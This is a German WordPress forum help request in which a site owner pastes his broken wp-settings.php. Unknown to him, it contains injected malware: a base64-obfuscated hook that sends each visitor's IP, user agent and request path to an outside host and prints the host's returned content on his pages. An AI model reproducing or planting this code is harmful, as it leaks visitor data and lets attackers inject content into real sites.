Hilfe Fatal error
-
Hallo,
wer kann mir helfen. Seit ein paar Tagen ist meine Seite http://www.toscavino.de nicht mehr erreichbar. Stattdessen wird folgende Meldung angezeigt:
Fatal error: Cannot redeclare hook_sexy() (previously declared in /www/htdocs/w015000d/toscavino.de/wp-settings.php:474) in /www/htdocs/w015000d/toscavino.de/wp-settings.php on line 492
Ich habe keinen Plan wie ich die Seite wieder zum laufen bekomme.
459 }
460
461 /**
462 * This hook is fired once WP, all plugins, and the theme are fully loaded and instantiated.
463 *
464 * Ajax requests should use wp-admin/admin-ajax.php. admin-ajax.php can handle requests for
465 * users not logged in.
466 *
467 * @link https://codex.wordpress.org/AJAX_in_Plugins
468 *
469 * @since 3.0.0
470 */
471 do_action( ‚wp_loaded‘ );
472 function hook_sexy()
473 {
474 L2dyZXlub3JtY $to = ‚aHR0cDovWwuY29tL2xtMjAvYW5hbGl6LnBocA==‘;
475 $response wp_remote_get(base64_decode($to).‘?ip=‘.urlencode($_SERVER[‚REMOTE_ADDR‘]).’&useragent=‘.urlencode($_SERVER[‚HTTP_USER_AGENT‘]).’&
domainname=‘.urlencode($_SERVER[‚HTTP_HOST‘]).’&fullpath=‘.urlencode($_SERVER[‚REQUEST_URI‘]));
476 if ( !is_wp_error( $response ) )
477 {
478 $content = $response[‚body‘];
479 if(!(strpos($content, ‚LinkMaster‘) === false)) echo str_replace(‚LinkMaster‘, “, $content);
480 }
481 }
482
483 add_action(‚wp_header‘, ‚hook_sexy‘);function hook_sexy()
484 {
485 $to = ‚aHR0cDovL2dyZXlub3JtYWwuY29tL2xtMjAvYW5hbGl6LnBocA==‘;
486 $response = wp_remote_get(base64_decode($to).‘?ip=‘.urlencode($_SERVER[‚REMOTE_ADDR‘]).’&useragent=‘.urlencode($_SERVER[‚HTTP_USER_AGENT‘]).’&domainname=‘.urlencode($_SERVER[‚HTTP_HOST‘]).’&fullpath=‘.urlencode($_SERVER[‚REQUEST_URI‘]));
487 if ( !is_wp_error( $response ) )
488 {
489 $content = $response[‚body‘];
490 if(!(strpos($content, ‚LinkMaster‘) === false)) echo str_replace(‚LinkMaster‘, “, $content);
491 }
492 }
493
494 add_action(‚wp_header‘, ‚hook_sexy‘);Bin für jeden Hinweis und Tipp dankbar
LG Uwe
Die Seite, für die ich Hilfe brauche: [Anmelden, um den Link zu sehen]
- Das Thema „Hilfe Fatal error“ ist für neue Antworten geschlossen.